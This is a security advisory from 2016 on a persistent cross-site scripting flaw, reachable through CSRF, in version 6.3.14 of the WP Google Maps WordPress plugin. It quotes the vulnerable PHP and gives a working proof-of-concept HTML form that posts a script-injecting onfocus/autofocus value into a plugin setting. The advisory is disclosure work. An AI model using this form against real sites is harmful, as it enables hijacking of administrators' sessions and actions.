------------------------------------------------------------------------
Persistent Cross-Site Scripting in WP Google Maps Plugin via CSRF
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability was found in the WP
Google Maps Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0007

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the WP Google Maps [2] WordPress
Plugin version 6.3.14.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Google Maps [3] WordPress Plugin version
6.3.15.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP Google Maps plugin is a plugin to create a custom Google map with
high quality markers containing categories, descriptions, images and
links. A persistent Cross-Site Scripting vulnerability was found in the
WP Google Maps Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wpGoogleMaps.php and is caused by the lack
of output encoding on the wpgmza_store_locator_query_string request
parameter. The parameter is sanitized with sanitize_text_field, which
will encode characters for usage in HTML context. However, the parameter
is used in JavaScript context, allowing for Cross-Site Scripting. The
vulnerable code is listed below.
$other_settings['store_locator_query_string'] =
sanitize_text_field($_POST['wpgmza_store_locator_query_string']);
if (isset($_POST['wpgmza_store_locator_restrict'])) {
$other_settings['wpgmza_store_locator_restrict'] =
sanitize_text_field($_POST['wpgmza_store_locator_restrict']); }
[..]
if (isset($map_other_settings['wpgmza_store_locator_restrict'])) {
$restrict_search = $map_other_settings['wpgmza_store_locator_restrict'];
} else { $restrict_search = false; }
[..]
{ types: ['geocode'], componentRestrictions: {country: '<?php echo
$restrict_search; ?>'} });

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
Have an authenticated admin visit a webpage with the following form:

<html>
	<body>
		<form action="http://<wordpress
site>/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1"
method="POST">
			<input type="hidden" name="wpgmza&#95;id" value="1" />
			<input type="hidden" name="wpgmza&#95;start&#95;location"
value="45&#46;950464398418106&#44;&#45;109&#46;81550500000003" />
			<input type="hidden" name="wpgmza&#95;start&#95;zoom" value="2" />
			<input type="hidden" name="wpgmza&#95;title"
value="My&#32;first&#32;map" />
			<input type="hidden" name="wpgmza&#95;width" value="100" />
			<input type="hidden" name="wpgmza&#95;map&#95;width&#95;type"
value="&#37;" />
			<input type="hidden" name="wpgmza&#95;height" value="400" />
			<input type="hidden" name="wpgmza&#95;map&#95;height&#95;type"
value="px" />
			<input type="hidden" name="wpgmza&#95;map&#95;align" value="1" />
			<input type="hidden" name="wpgmza&#95;map&#95;type" value="1" />
			<input type="hidden" name="wpgmza&#95;theme&#95;data&#95;0" value=""
/>
			<input type="hidden" name="wpgmza&#95;store&#95;locator&#95;restrict"
value="ad" />
			<input type="hidden"
name="wpgmza&#95;store&#95;locator&#95;query&#95;string"
value="&#58;i8gr4&quot;onfocus&#61;&quot;alert&#40;1&#41;&quot;autofocus&#61;&quot;"
/>
			<input type="hidden" name="wpgmza&#95;store&#95;locator&#95;bounce"
value="on" />
			<input type="hidden" name="wpgmza&#95;max&#95;zoom" value="1" />
			<input type="hidden" name="wpgmza&#95;savemap"
value="Save&#32;Map&#32;Â&#187;" />
			<input type="hidden" name="wpgmza&#95;edit&#95;id" value="" />
			<input type="hidden" name="wpgmza&#95;animation" value="0" />
			<input type="hidden" name="wpgmza&#95;infoopen" value="0" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

When the form is submitted (or auto-submitted), a popup box will appear,
which means that the JavaScript from the parameter
wpgmza_store_locator_query_string is executed in the admin's browser.
The JavaScript will run every time the map (with id 1 in this case) is
viewed/edited by an admin.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_google_maps_plugin_via_csrf.html
[2] https://wordpress.org/plugins/wp-google-maps/
[3] https://downloads.wordpress.org/plugin/wp-google-maps.zip/